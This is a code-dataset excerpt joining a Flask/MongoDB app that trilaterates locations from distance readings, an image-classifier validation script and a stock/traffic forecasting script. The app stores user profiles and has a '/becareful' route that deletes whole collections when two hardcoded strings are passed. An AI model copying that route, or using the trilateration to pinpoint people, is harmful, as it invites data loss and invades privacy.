'latitude': t[d]['latitude'],
'longitude': t[d]['longitude'],
} )
return ret
except Exception as e:
error_print(e)
return None
def delete_information(self, t):
if not t:
return None
try:
db = self.connect.get_database(global_db_name)
count = 0
collection = None
if t == "users":
collection = db.get_collection(global_db_user_collection)
elif t == "device":
collection = db.get_collection(global_db_device_collection)
elif t == "points":
collection = db.get_collection(global_db_origin_collection)
elif t == "result":
collection = db.get_collection(global_db_calc_collection)
if not collection:
return count
result = collection.delete_many({})
if result:
count = result.deleted_count
return count
except Exception as e:
error_print(e)
return None
global_unique_opt_obj = None
global_unique_opt_obj_mx = threading.Lock()
def get_unique_opt():
global global_unique_opt_obj
global global_unique_opt_obj_mx
global_unique_opt_obj_mx.acquire()
if not global_unique_opt_obj:
try:
global_unique_opt_obj = opt()
except Exception as e:
global_unique_opt_obj = None
error_print(e)
pass
global_unique_opt_obj_mx.release()
return global_unique_opt_obj
def unique_push_data(data):
obj = get_unique_opt()
if not obj:
return None
return obj.producer(data)
def unique_check_and_calc(id, start, end, tunit):
obj = get_unique_opt()
if not obj:
return None
start = string_standard(start)
end = string_standard(end)
ret = obj.check_and_calc(id, start, end, tunit)
return ret
def unique_origin_points(id, start, end):
obj = get_unique_opt()
if not obj:
return None
start = string_standard(start)
end = string_standard(end)
ret = obj.origin_points(id, start, end)
return ret
def unique_show_name(name):
obj = get_unique_opt()
if not obj:
return None
ret = obj.show_search({"name":name})
return ret
def unique_show_search(args):
obj = get_unique_opt()
if not obj:
return None
ret = obj.show_search(args)
return ret
def unique_set_device(task, device, la, lo):
obj = get_unique_opt()
if not obj:
return None
ret = obj.set_device(task, device, la, lo)
return ret
def unique_setall_device(task, data):
obj = get_unique_opt()
if not obj:
return None
ret = obj.setall_device(task, data)
return ret
def unique_get_device(task, device):
obj = get_unique_opt()
if not obj:
return None
ret = obj.get_device(task, device)
return ret
def unique_get_device_all(task):
obj = get_unique_opt()
if not obj:
return None
ret = obj.get_device_all(task)
return ret
def unique_delete_device(task, device):
obj = get_unique_opt()
if not obj:
return None
ret = obj.delete_device(task, device)
return ret
def unique_delete_information(t):
obj = get_unique_opt()
if not obj:
return None
ret = obj.delete_information(t)
return ret
def unique_NearPoint(lat, lng, count):
obj = get_unique_opt()
if not obj:
return None
ret = obj.NearPoint(lat, lng, count)
return ret
```
#### File: gpsmap/gpsmap/calc_postion.py
```python
import utm
import math
baidu_ak = '<KEY>'
global_EP = 50
global_status = ['Err', 'far','outside','inside','cross','include']
class utm_point():
def __init__(self, x = 0.0, y = 0.0, zone = 0, mark = '', r = 0.0):
self.x = x
self.y = y
self.zone = zone
self.mark = mark
self.r = r
def __str__(self):
return "(x:{0}, y:{1}, zone:{2}, mark:{3}, distance:{4})".format(self.x, self.y, self.zone, self.mark, self.r)
def is_same_zone(self, dst):
return self.zone == dst.zone and self.mark == dst.mark
def sqr(a):
return a * a
def distance(a, b):
width = a.x - b.x if a.x > b.x else b.x -a.x
length = a.y - b.y if a.y > b.y else b.y -a.y
return math.sqrt(sqr(width) + sqr(length))
def calc_cross_point(A, B, EP = global_EP):
d = distance(A, B);
if A.r + B.r + EP < d:
return 1, None, None
elif d < EP:
return 5, None, None
ia = utm_point(zone=A.zone, mark = A.mark, r=EP)
ib = utm_point(zone=A.zone, mark = A.mark, r=EP)
sqr_k = sqr(A.r)
a = B.x - A.x
sqr_a = sqr(a)
b = B.y - A.y
sqr_b = sqr(b)
    # keep d as the centre distance (used by the tangency checks below) and use
    # dd for the constant term of the radical-line equation
    dd = sqr(B.r) - sqr_k - sqr_a - sqr_b
    aa = 4 * sqr_a + 4 * sqr_b
    bb = 4 * b * dd
    cc = sqr(dd) - 4 * sqr_a * sqr_k
drt = sqr(bb) - 4 * aa * cc
if drt < 0:
return 5, None, None
drt = math.sqrt(drt);
ia.y = (-bb + drt) / 2 / aa
ib.y = (-bb - drt) / 2 / aa
if math.fabs(a) < EP:
ia.x = math.sqrt(sqr_k - sqr(ia.y))
ib.x = -ia.x
else:
        ia.x = (2 * b * ia.y + dd) / -2 / a
        ib.x = (2 * b * ib.y + dd) / -2 / a
ia.x += A.x;
ia.y += A.y;
ib.x += A.x;
ib.y += A.y;
if math.fabs(ia.y - ib.y) < EP:
if abs(A.r + B.r - d) < EP:
return 2, ia, ib
if abs(d + min(A.r, B.r) - max(A.r, B.r)) < EP:
return 3, ia, ib
return 4, ia, ib
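# Hedged usage sketch (example values only, not part of the original module).
# calc_cross_point classifies the two circles with the status codes of
# global_status: 1 'far', 2 'outside' (external tangency), 3 'inside'
# (internal tangency), 4 'cross' (two intersection points), 5 'include'
# (coincident centres or no real intersection). For two stations 200 m apart
# with 150 m ranges the expected outcome is two symmetric candidates:
#   a = utm_point(x=0.0, y=0.0, zone=50, mark='R', r=150.0)
#   b = utm_point(x=200.0, y=0.0, zone=50, mark='R', r=150.0)
#   s, p1, p2 = calc_cross_point(a, b)   # s == 4, p1/p2 mirrored about y = 0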
def calc_distance_utm(u1,u2,u3, EP):
s, p1, p2 = calc_cross_point(u1, u2)
if not p1 or not p2:
return None
p1.r = EP
p2.r = EP
pr = None
if s == 2 or s == 3:
d1 = distance(p1, u3)
if math.fabs(d1 -u3.r) < EP:
pr = p1
elif s == 4:
d1 = distance(p1, u3)
d2 = distance(p2, u3)
b1 = u3.r - EP < d1 and d1 < u3.r + EP
b2 = u3.r - EP < d2 and d2 < u3.r + EP
if not b1 and not b2:
pr = None
elif not b1 and b2:
pr = p2
elif b1 and not b2:
pr = p1
else : # b1 and b2
d1 = math.fabs(d1 - u3.r)
d2 = math.fabs(d2 - u3.r)
pr = p1 if d1 < d2 else p2
if pr:
return pr
return None
def calc( latitude1, longitude1, r1,
latitude2, longitude2, r2,
latitude3, longitude3, r3, EP = global_EP):
try:
u1 = utm_point( *utm.from_latlon(latitude1,longitude1), r=r1)
u2 = utm_point( *utm.from_latlon(latitude2,longitude2), r=r2)
u3 = utm_point( *utm.from_latlon(latitude3,longitude3), r=r3)
except Exception as e:
return None
pr = calc_distance_utm(u1,u2,u3, EP)
if pr:
latitude, longitude = utm.to_latlon(pr.x, pr.y, pr.zone, pr.mark)
return latitude, longitude, pr.r
return None
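# Hedged usage sketch (coordinates below are made-up sample values): calc()
# trilaterates one fix from three (latitude, longitude, range-in-metres)
# measurements after projecting them into UTM:
#   fix = calc(31.2304, 121.4737, 500,
#              31.2330, 121.4790, 480,
#              31.2280, 121.4800, 520, EP=100)
#   if fix:
#       lat, lon, err = fix   # err is the EP-sized uncertainty radius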
def calc_list_core( l_points, EP, func_fretch ):
npos1 = 0
npos2 = 0
npos3 = 0
list_count = len(l_points)
ret_list = {}
ret_list[3]=[]
ret_list[5]=[]
while npos1 < list_count - 2:
try:
la1, lo1, dis1 = func_fretch(l_points[npos1])
npos1 = npos1 + 1
if not la1 or not lo1 or not dis1:
continue
u1 = utm_point(*utm.from_latlon(la1,lo1), r=int(dis1))
except Exception as e:
continue
npos2 = npos1
while npos2 < list_count - 1:
try:
la2, lo2, dis2 = func_fretch(l_points[npos2])
npos2 = npos2 + 1
if not la2 or not lo2 or not dis2:
continue
u2 = utm_point( *utm.from_latlon(la2,lo2), r=int(dis2))
except Exception as e:
continue
s, p1, p2 = calc_cross_point(u1, u2)
if not p1 or not p2:
continue
npos3 = npos2
while npos3 < list_count:
try:
la3, lo3, dis3 = func_fretch(l_points[npos3])
npos3 = npos3 + 1
if not la3 or not lo3 or not dis3:
continue
u3 = utm_point( *utm.from_latlon(la3,lo3), r=int(dis3))
except Exception as e:
continue
ret, level = calc_list_core_cross_point(s, p1, p2, u3, EP)
if ret:
return ret, level
return None, 0
def calc_list_core_cross_point(s, p1, p2, u3, EP):
if s == 2 or s == 3:
d1 = distance(p1, u3)
if math.fabs(d1 - u3.r) < EP:
return p1, 5
elif s == 4:
d1 = distance(p1, u3)
d2 = distance(p2, u3)
b1 = u3.r - EP < d1 and d1 < u3.r + EP
b2 = u3.r - EP < d2 and d2 < u3.r + EP
if not b1 and not b2:
return None, 0
elif not b1 and b2:
return p2, 1
elif b1 and not b2:
return p1, 1
else:
d1 = math.fabs(d1 - u3.r)
d2 = math.fabs(d2 - u3.r)
return p1 if d1 < d2 else p2, 3
    # callers unpack (point, level), so keep the return arity consistent
    return None, 0
def calc_list_core_cover_zone(s, p1, p2, u3):
if s in [2,3]:
d1 = distance(p1,u3)
if d1 < u3.r:
p1.r = u3.r - d1
if p1.r > d1:
p1.r = d1
return p1, 5
elif s == 4:
d1 = distance(p1, u3)
d2 = distance(p2, u3)
        # a candidate is usable when it falls inside the covering circle u3
        b1 = d1 < u3.r
        b2 = d2 < u3.r
if True not in [b1, b2]:
return None, None
elif not b1 and b2:
return calc_point_then_middle(u3, p2, d2), 1
elif b1 and not b2:
return calc_point_then_middle(u3, p1, d1), 1
else:
return calc_middle_then_point(u3, p1, d1, p2, d2), 3
    return None, None
def calc_point_then_middle(u3, p, d):
ret = utm_point(zone=p.zone, mark = p.mark, r=(u3.r - d)/2 )
    # midpoint between p and the boundary of u3 along the ray u3 -> p
    rate = (d + ret.r) / d
    ret.x = u3.x + (p.x - u3.x) * rate
    ret.y = u3.y + (p.y - u3.y) * rate
return ret
def calc_middle_then_point(u3, p1,d1, p2,d2):
ret = calc_middle_point(p1, p2)
d1 = distance(u3, ret)
d2 = u3.r - d1
if d2 > d1:
d2 = d1
if ret.r > d2:
ret.r = d2
return ret
def calc_middle_point(p1, p2):
d1 = distance(p1, p2)
    ret = utm_point(zone=p1.zone, mark=p1.mark, r=d1/2)
ret.x = (p1.x + p2.x)/2
ret.y = (p1.y + p2.y)/2
return ret
def calc_list_precheck(l_points, func_fretch):
ret = {}
if len(l_points) < 3:
return False
for o in l_points:
la, lo, _ = func_fretch(o)
if la and lo:
ret[(la,lo)] = True
if len(ret) < 3:
return False
return True
def calc_list( l_points, EP, func_fretch ):
if not calc_list_precheck(l_points, func_fretch):
return None
pr, level = calc_list_core(l_points, EP, func_fretch)
if pr:
latitude, longitude = utm.to_latlon(pr.x, pr.y, pr.zone, pr.mark)
return latitude, longitude, pr.r, level
return None
```
#### File: gpsmap/gpsmap/work_app.py
```python
import calc_postion
import datetime
import backend
import json
import io
from baselib import error_print
from flask import Flask, render_template, make_response
from flask import request
from flask_restful import reqparse, abort, Api, Resource
app = Flask(__name__)
api_loader = Api(app)
parser = reqparse.RequestParser()
for pa in ['la1', 'lo1', 'd1',
'la2', 'lo2', 'd2',
'la3', 'lo3', 'd3', 'EP',
'data', 'name', 'id', 'task',
'start', 'end', 'tunit', 'count',
'device', 'action', 'latitude', 'longitude',
'sign', 'gender', 'country', 'province', 'city',
'ocount', 'pcount',
]:
parser.add_argument(pa)
def html_template(page):
args = parser.parse_args()
args['name_js'] = page + '.js'
args['name_css'] = page + '.css'
return render_template('points_template.html', **args)
def html(page):
args = parser.parse_args()
args['name_js'] = page + '.js'
args['name_css'] = page + '.css'
if not args["id"]:
args["id"] = ''
return render_template('template_html.html', **args)
## For debug show demo page
@app.route('/demo', methods=['GET'])
def demo():
return html("demo")
## Show calc points page
@app.route('/cpoints', methods=['GET'])
def cpoints():
return html_template("cpoints")
## Show calc points page
@app.route('/opoints', methods=['GET'])
def opoints():
return html_template("opoints")
## Show near points page
@app.route('/npoints', methods=['GET'])
def npoints():
return html_template("npoints")
## Show device points page
@app.route('/dpoints', methods=['GET'])
def dpoints():
return html_template("dpoints")
@app.route('/name', methods=['GET'])
def js_page():
return html("name")
@app.route('/calc', methods=['GET'])
def calc():
args = parser.parse_args()
try:
la1 = float(args['la1'])
lo1 = float(args['lo1'])
d1 = float(args['d1'])
la2 = float(args['la2'])
lo2 = float(args['lo2'])
d2 = float(args['d2'])
la3 = float(args['la3'])
lo3 = float(args['lo3'])
d3 = float(args['d3'])
EP = 100
if args['EP']:
EP = float(args['EP'])
if not EP:
EP = 100
r = calc_postion.calc(la1, lo1, d1, la2, lo2, d2, la3, lo3, d3, EP)
if not r:
return '{"success": 0}'
# calc
return '{{"success": 1, "la":{0}, "lo":{1}, "dis":{2} }}'.format( r[0], r[1], r[2] )
except Exception as e:
return '{"success": 0}'
@app.route("/upload", methods=['GET', 'POST'])
def upload():
args = parser.parse_args()
try:
if 'data' not in args or not args['data']:
return '{"success": 0}'
if backend.unique_push_data(args['data']):
return '{"success": 1}'
except Exception as e:
print("{0} {1}".format(__name__, e))
pass
return '{"success": 0}'
@app.route("/show", methods=['GET', 'POST'])
def show():
args = parser.parse_args()
try:
ret = backend.unique_show_search(args)
if ret:
data = { "success": 1,
"data": ret}
ret = json.dumps(data, indent= None)
return ret
except Exception as e:
print("{0} {1}".format(__name__, e))
return '{"success": 0}'
@app.route("/result", methods=['GET', 'POST'])
def result():
args = parser.parse_args()
if 'id' not in args or not args['id']:
return '{"success": 0}'
try:
ret = backend.unique_check_and_calc(args['id'], args['start'], args['end'], args['tunit'])
if ret:
data = {"success": 1,
"data": ret}
ret = json.dumps(data, indent=None)
return ret
except Exception as e:
print("{0} {1}".format(__name__, e))
pass
return '{"success": 0}'
@app.route("/near", methods=['GET', 'POST'])
def near():
args = parser.parse_args()
try:
latitude = float(args['latitude'])
longitude = float(args['longitude'])
count = int(args['count'])
if not count:
count = 20
if latitude and longitude:
ret = backend.unique_NearPoint(latitude,longitude, count)
if ret:
data = {"success": 1,
"data": ret}
ret = json.dumps(data, indent=None)
return ret
except Exception as e:
print("{0} {1}".format(__name__, e))
return '{"success": 0}'
@app.route("/origin", methods=['GET', 'POST'])
def origin():
args = parser.parse_args()
if 'id' not in args or not args['id']:
return '{"success": 0}'
try:
ret = backend.unique_origin_points(args['id'], args['start'], args['end'])
if ret:
data = {"success": 1,
"data": ret}
ret = json.dumps(data, indent=None)
return ret
except Exception as e:
print("{0} {1}".format(__name__, e))
return '{"success": 0}'
@app.route("/device", methods=['GET', 'POST'])
def device():
args = parser.parse_args()
a = 'get'
task = "node"
if args['action']:
a = args['action'].lower()
if args['task'] and len(args['task']):
task = args['task']
if a == 'setall':
ret = backend.unique_setall_device(task, args['data'])
if ret:
data = {"success": 1,
"data": ret}
ret = json.dumps(data, indent=None)
return ret
return '{"success": 0}'
if a == 'getall':
ret = backend.unique_get_device_all(task)
if ret:
data = {"success": 1,
"data": ret}
ret = json.dumps(data, indent=None)
return ret
if not args['device']:
return '{"success": 0}'
if a == 'set' and args['latitude'] and args['longitude']:
if backend.unique_set_device(task, args['device'], float(args['latitude']), float(args['longitude'])):
return '{"success": 1}'
elif a == 'delete':
if backend.unique_delete_device(task, args['device']):
return '{"success": 1}'
else:
ret = backend.unique_get_device(task, args['device'])
if ret:
data = {"success": 1,
"data": ret}
ret = json.dumps(data, indent=None)
return ret
return '{"success": 0}'
@app.route("/becareful", methods=['GET', 'POST'])
def becareful():
args = parser.parse_args()
action = args["action"]
name = args["name"]
i = args["id"]
if name != "IknowPasswoRd" or i != "RisIngRiRi":
return '{"success": 0}'
if action not in ["users", "device", "points"]:
return '{"success": 0}'
ret = backend.unique_delete_information(action)
if ret:
return '{"success": 1}'
return '{"success": 0}'
#main enter
global_main_enter = {}
for key in ["cpoints", "opoints", "npoints", "dpoints"]:
global_main_enter[key] = html_template
for key in ["demo", "name"]:
global_main_enter[key] = html
global_main_enter["calc"] = calc
## Show Main page
@app.route('/', methods=['GET'])
def index():
return html_template("index")
@app.route("/<action>", methods=['GET', 'POST'])
def enter(action):
try:
action = action.lower()
except Exception as e:
error_print(e)
abort(404)
return
if action not in global_main_enter:
abort(404)
return
function = global_main_enter[action]
return function(action)
``` |
{
"source": "Johnzhjw/CIT2FR-FL-NAS",
"score": 2
} |
#### File: Johnzhjw/CIT2FR-FL-NAS/validation.py
```python
import time
import json
import torch
import logging
import argparse
from collections import OrderedDict
from timm.utils import accuracy, AverageMeter, setup_default_logging
from codebase.run_manager import get_run_config
from codebase.networks.nsganetv2 import NSGANetV2
def validate(model, loader, criterion, log_freq=50):
batch_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
top5 = AverageMeter()
model.eval()
end = time.time()
with torch.no_grad():
for i, (input, target) in enumerate(loader):
target = target.cuda()
input = input.cuda()
# compute output
output = model(input)
loss = criterion(output, target)
# measure accuracy and record loss
acc1, acc5 = accuracy(output.data, target, topk=(1, 5))
losses.update(loss.item(), input.size(0))
top1.update(acc1.item(), input.size(0))
top5.update(acc5.item(), input.size(0))
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
if i % log_freq == 0:
logging.info(
'Test: [{0:>4d}/{1}] '
'Time: {batch_time.val:.3f}s ({batch_time.avg:.3f}s, {rate_avg:>7.2f}/s) '
'Loss: {loss.val:>7.4f} ({loss.avg:>6.4f}) '
'Acc@1: {top1.val:>7.3f} ({top1.avg:>7.3f}) '
'Acc@5: {top5.val:>7.3f} ({top5.avg:>7.3f})'.format(
i, len(loader), batch_time=batch_time,
rate_avg=input.size(0) / batch_time.avg,
loss=losses, top1=top1, top5=top5))
results = OrderedDict(
top1=round(top1.avg, 4), top1_err=round(100 - top1.avg, 4),
top5=round(top5.avg, 4), top5_err=round(100 - top5.avg, 4))
logging.info(' * Acc@1 {:.1f} ({:.3f}) Acc@5 {:.1f} ({:.3f})'.format(
results['top1'], results['top1_err'], results['top5'], results['top5_err']))
def main(args):
setup_default_logging()
logging.info('Running validation on {}'.format(args.dataset))
net_config = json.load(open(args.model))
if 'img_size' in net_config:
img_size = net_config['img_size']
else:
img_size = args.img_size
run_config = get_run_config(
dataset=args.dataset, data_path=args.data, image_size=img_size, n_epochs=0,
train_batch_size=args.batch_size, test_batch_size=args.batch_size,
n_worker=args.workers, valid_size=None)
model = NSGANetV2.build_from_config(net_config)
param_count = sum([m.numel() for m in model.parameters()])
logging.info('Model created, param count: %d' % param_count)
model = model.cuda()
criterion = torch.nn.CrossEntropyLoss().cuda()
validate(model, run_config.test_loader, criterion)
return
if __name__ == '__main__':
parser = argparse.ArgumentParser()
# data related settings
parser.add_argument('--data', type=str, default='/mnt/datastore/ILSVRC2012',
help='location of the data corpus')
parser.add_argument('--dataset', type=str, default='imagenet',
help='name of the dataset (imagenet, cifar10, cifar100, ...)')
parser.add_argument('-j', '--workers', type=int, default=6,
help='number of workers for data loading')
parser.add_argument('-b', '--batch-size', type=int, default=256,
help='test batch size for inference')
parser.add_argument('--img-size', type=int, default=224,
help='input resolution (192 -> 256)')
# model related settings
parser.add_argument('--model', '-m', metavar='MODEL', default='', type=str,
help='model configuration file')
parser.add_argument('--pretrained', type=str, default='',
help='path to pretrained weights')
cfgs = parser.parse_args()
main(cfgs)
``` |
{
"source": "Johnzhjw/evoIT2FRNN-GEP",
"score": 3
} |
#### File: PythonScripts/Python/main.py
```python
import time
import argparse
import torch.nn as nn
import torch
import torch.optim as optim
from torch.utils.data import DataLoader, Dataset
import numpy as np
from torch.autograd import Variable
import os
import pandas as pd
from torchvision import transforms
import json
import matplotlib.pyplot as plt
import torch.backends.cudnn as cudnn
from tqdm import tqdm
os.environ['KMP_DUPLICATE_LIB_OK'] = 'True'
class AverageMeter(object):
"""
Computes and stores the average and current value
Copied from: https://github.com/pytorch/examples/blob/master/imagenet/main.py
"""
def __init__(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
# Dataset wrapper pairing each feature window with its target value
class Mydataset(Dataset):
def __init__(self, xx, yy, transform=None):
self.x = xx
self.y = yy
self.tranform = transform
def __getitem__(self, index):
x1 = self.x[index]
y1 = self.y[index]
if self.tranform != None:
return self.tranform(x1.reshape(len(x1), -1)), y1
return x1.reshape(len(x1), -1), y1
def __len__(self):
return len(self.x)
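# Hedged usage sketch (synthetic arrays, not part of the original script):
# Mydataset pairs each feature window with its target, so a toy loader is
#   xs = [np.zeros((3, 4), dtype=np.float32) for _ in range(8)]
#   ys = [np.zeros(1, dtype=np.float32) for _ in range(8)]
#   loader = DataLoader(Mydataset(xs, ys), batch_size=4, shuffle=False)
#   for bx, by in loader:
#       pass  # bx: (4, 3, 4), by: (4, 1)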
def get_dataset(file_name='../dataset/Stk.0941.HK.all.csv', train_ratio=2 / 3, col_name_tar="Close", flag_multi=False,
flag_fuse=False, tag_norm='min-max', trn_batch_size=12, vld_batch_size=12, shuffle=True):
df = pd.read_csv(file_name)
# df = df.sort_index(ascending=True)
print(df.head(5))
train_len = int(len(df) * train_ratio)
    # use the open/close/high/low/volume columns as features and normalise them
# df = df[["Open", "Close", "High", "Low", "Volume", "Adjusted"]]
df = df[[col for i, col in enumerate(df.columns) if i]]
tar_min = df[col_name_tar][:train_len].min()
tar_max = df[col_name_tar][:train_len].max()
tar_mean = df[col_name_tar][:train_len].mean()
tar_std = df[col_name_tar][:train_len].std()
if tag_norm == 'min-max':
df = df.apply(lambda x: (x - min(x[:train_len])) / (max(x[:train_len]) - min(x[:train_len])))
elif tag_norm == 'Z-score':
df = df.apply(lambda x: (x - x[:train_len].mean()) / x[:train_len].std())
elif tag_norm == 'none':
df = df.apply(lambda x: x)
else:
print('Invalid norm type.')
df = df.fillna(0)
df.replace([np.inf, -np.inf], 0, inplace=True)
if flag_fuse:
train_inds = [i for i, col in enumerate(df.columns) if col != col_name_tar]
else:
train_inds = [i for i, col in enumerate(df.columns)]
if flag_multi:
n_ft = len(train_inds)
else:
n_ft = 1
train_inds = [i for i, col in enumerate(df.columns) if col == col_name_tar]
test_inds = [i for i, col in enumerate(df.columns) if col == col_name_tar]
total_len = df.shape[0]
sequence = 3
X = []
Y = []
for i in range(df.shape[0] - sequence):
X.append(np.array(df.iloc[i:(i + sequence), train_inds], dtype=np.float32).reshape(sequence, -1))
Y.append(np.array(df.iloc[(i + sequence), test_inds], dtype=np.float32).reshape(-1, ))
print(X[0])
print(Y[0])
    # build the train/test splits and wrap them in DataLoaders
trainx, trainy = X[:(train_len - sequence)], Y[:(train_len - sequence)]
testx, testy = X[(train_len - sequence):], Y[(train_len - sequence):]
train_loader = DataLoader(dataset=Mydataset(trainx, trainy, transform=transforms.ToTensor()),
batch_size=trn_batch_size, shuffle=shuffle)
test_loader = DataLoader(dataset=Mydataset(testx, testy), batch_size=vld_batch_size, shuffle=shuffle)
return {'tar_min': tar_min, 'tar_max': tar_max, 'tar_mean': tar_mean, 'tar_std': tar_std, 'n_ft': n_ft,
'total_len': total_len, 'train_len': train_len, 'sequence': sequence, 'tag_norm': tag_norm,
'col_name_tar': col_name_tar, 'df': df, 'train_loader': train_loader, 'test_loader': test_loader}
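# Hedged usage sketch (uses the script's default dataset arguments): get_dataset
# returns the loaders together with the scaling constants needed to undo the
# normalisation when reporting errors:
#   args = get_dataset(file_name='../dataset/_TS/traffic.csv',
#                      col_name_tar='Slowness_in_traffic', tag_norm='min-max')
#   train_loader, test_loader = args['train_loader'], args['test_loader']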
def save_net_config(path, net, config_name='net.config'):
""" dump run_config and net_config to the model_folder """
net_save_path = os.path.join(path, config_name)
json.dump(net.config, open(net_save_path, 'w'), indent=4)
print('Network configs dump to %s' % net_save_path)
def save_net(path, net, model_name):
""" dump net weight as checkpoint """
if isinstance(net, torch.nn.DataParallel):
checkpoint = {'state_dict': net.module.state_dict()}
else:
checkpoint = {'state_dict': net.state_dict()}
model_path = os.path.join(path, model_name)
torch.save(checkpoint, model_path)
print('Network model dump to %s' % model_path)
class lstm(nn.Module):
def __init__(self, input_size=5, hidden_size=10, output_size=1):
super(lstm, self).__init__()
        # LSTM input shape: (batch, seq_len, input_size)
self.hidden_size = hidden_size
self.input_size = input_size
self.output_size = output_size
self.rnn = nn.LSTM(input_size=self.input_size, hidden_size=self.hidden_size, batch_first=True)
self.linear = nn.Linear(self.hidden_size, self.output_size)
def forward(self, x):
out, (hidden, cell) = self.rnn(x)
# x.shape : batch,seq_len,hidden_size , hn.shape and cn.shape : num_layes * direction_numbers,batch,hidden_size
a, b, c = hidden.shape
out = self.linear(hidden.reshape(a * b, c))
return out
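# Hedged shape sketch (illustrative only): the lstm module consumes a
# (batch, seq_len, input_size) tensor and predicts one value per sample from
# the final hidden state:
#   net = lstm(input_size=5, hidden_size=10, output_size=1)
#   out = net(torch.randn(12, 3, 5))   # out.shape == (12, 1)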
class CNNNetwork(nn.Module):
def __init__(self, sequence=3, n_ft=1):
super(CNNNetwork, self).__init__()
self.conv = nn.Conv2d(1, 64, kernel_size=(sequence, 1))
self.relu = nn.ReLU(inplace=True)
self.Linear1 = nn.Linear(64 * n_ft, 50)
self.Linear2 = nn.Linear(50, 1)
def forward(self, x):
x = self.conv(x.unsqueeze(1))
x = self.relu(x)
x = x.flatten(1)
x = self.Linear1(x)
x = self.relu(x)
x = self.Linear2(x)
return x
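# Hedged shape sketch (illustrative only): CNNNetwork convolves over the whole
# time window with a (sequence x 1) kernel, so for sequence=3 and n_ft=4
#   net = CNNNetwork(sequence=3, n_ft=4)
#   out = net(torch.randn(12, 3, 4))   # out.shape == (12, 1)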
class TSA_uni():
def __init__(self, model_name, data, flag_print=False, sequence=3, n_ft=1):
super(TSA_uni, self).__init__()
self.model_name = model_name
self.sequence = sequence
def pred(self, data, n_known):
preds = []
labels = []
for i, ind in enumerate(range(n_known, len(data))):
if 'naive' in self.model_name:
yhat = data[ind-1]
elif 'avg' in self.model_name:
yhat = np.mean(data[:n_known])
elif 'mov_win' in self.model_name:
yhat = np.mean(data[ind-self.sequence:ind])
preds.append(yhat)
labels.append(data.tolist()[ind])
return preds, labels
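# Hedged sketch (toy series, not from the original script): TSA_uni provides
# three baselines -- last value ('naive'), mean of the known prefix ('avg') and
# a moving-window mean ('mov_win'):
#   base = TSA_uni('TSA_uni_mov_win', data=None, sequence=3)
#   preds, labels = base.pred(pd.Series([1.0, 2.0, 3.0, 4.0, 5.0]), n_known=3)
#   # preds == [2.0, 3.0], labels == [4.0, 5.0]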
class get_model():
def __init__(self, args, name_model='lstm', lstm_hid_size=10, lr=0.001):
self.args = args
self.name_model = name_model
self.criterion = nn.MSELoss()
if name_model == 'lstm':
self.model = lstm(input_size=args['n_ft'], hidden_size=lstm_hid_size)
self.optimizer = optim.Adam(self.model.parameters(), lr=lr)
elif name_model == 'cnn':
self.model = CNNNetwork(sequence=args['sequence'], n_ft=args['n_ft'])
self.optimizer = optim.Adam(self.model.parameters(), lr=lr)
elif 'TSA_uni' in name_model:
self.TSA_agent = TSA_uni(model_name=name_model,
data=args['df'][args['col_name_tar']][:args['train_len']],
flag_print=False, sequence=args['sequence'], n_ft=args['n_ft'])
else:
print('Invalid network type')
if 'TSA_uni' not in name_model and torch.cuda.is_available():
self.device = torch.device('cuda:0')
self.model = self.model.to(self.device)
cudnn.benchmark = True
else:
self.device = torch.device('cpu')
def train(self, i_run, n_epochs=200, flag_info=False):
if 'TSA_uni' in self.name_model:
return
if flag_info:
nBatch = len(self.args['train_loader'])
for i in range(n_epochs):
if self.name_model == 'cnn':
self.model.train()
losses = AverageMeter()
data_time = AverageMeter()
total_loss = 0
with tqdm(total=nBatch,
desc='Run #{} Train Epoch #{}'.format(i_run, i + 1)) as t:
end = time.time()
for idx, (data, label) in enumerate(self.args['train_loader']):
data_time.update(time.time() - end)
data, label = data.to(self.device), label.to(self.device)
data1 = data.squeeze(1)
if self.name_model == 'cnn':
pred = self.model(data1)
else:
pred = self.model(Variable(data1))
loss = self.criterion(pred, label)
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
total_loss += loss.item()
# measure accuracy and record loss
losses.update(loss.item(), data.size(0))
t.set_postfix({
'loss': losses.avg,
# 'lr': new_lr,
# 'loss_type': loss_type,
'data_time': data_time.avg,
})
t.update(10)
end = time.time()
else:
for i in range(n_epochs):
if self.name_model == 'cnn':
self.model.train()
for idx, (data, label) in enumerate(self.args['train_loader']):
data, label = data.to(self.device), label.to(self.device)
data1 = data.squeeze(1)
if self.name_model == 'cnn':
pred = self.model(data1)
else:
pred = self.model(Variable(data1))
loss = self.criterion(pred, label)
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
def test(self):
        # evaluate on the test split
if 'TSA_uni' not in self.name_model:
if self.name_model == 'cnn':
self.model.eval()
preds = []
labels = []
for idx, (x, label) in enumerate(self.args['test_loader']):
x, label = x.to(self.device), label.to(self.device)
x = x.squeeze(1) # batch_size,seq_len,input_size
pred = self.model(x)
preds.extend(pred.data.squeeze(1).tolist())
labels.extend(label.squeeze(1).tolist())
else:
preds, labels = self.TSA_agent.pred(self.args['df'][self.args['col_name_tar']], self.args['train_len'])
# print(len(preds[0:50]))
# print(len(labels[0:50]))
if self.args['tag_norm'] == 'min-max':
res_final = np.sqrt(self.criterion(torch.Tensor(preds), torch.Tensor(labels))) * \
(self.args['tar_max'] - self.args['tar_min'])
print(res_final)
plt.plot(
[ele * (self.args['tar_max'] - self.args['tar_min']) + self.args['tar_min'] for ele in preds[0:50]],
"r", label="pred")
plt.plot(
[ele * (self.args['tar_max'] - self.args['tar_min']) + self.args['tar_min'] for ele in labels[0:50]],
"b", label="real")
elif self.args['tag_norm'] == 'Z-score':
res_final = np.sqrt(self.criterion(torch.Tensor(preds), torch.Tensor(labels))) * self.args['tar_std']
print(res_final)
plt.plot([ele * self.args['tar_std'] + self.args['tar_mean'] for ele in preds[0:50]], "r", label="pred")
plt.plot([ele * self.args['tar_std'] + self.args['tar_mean'] for ele in labels[0:50]], "b", label="real")
elif self.args['tag_norm'] == 'none':
res_final = np.sqrt(self.criterion(torch.Tensor(preds), torch.Tensor(labels)))
print(res_final)
plt.plot([ele for ele in preds[0:50]], "r", label="pred")
plt.plot([ele for ele in labels[0:50]], "b", label="real")
else:
print('Invalid norm type.')
plt.show()
return res_final
def main(args):
all_res = []
os.makedirs(args.save, exist_ok=True)
for i in range(args.iterations):
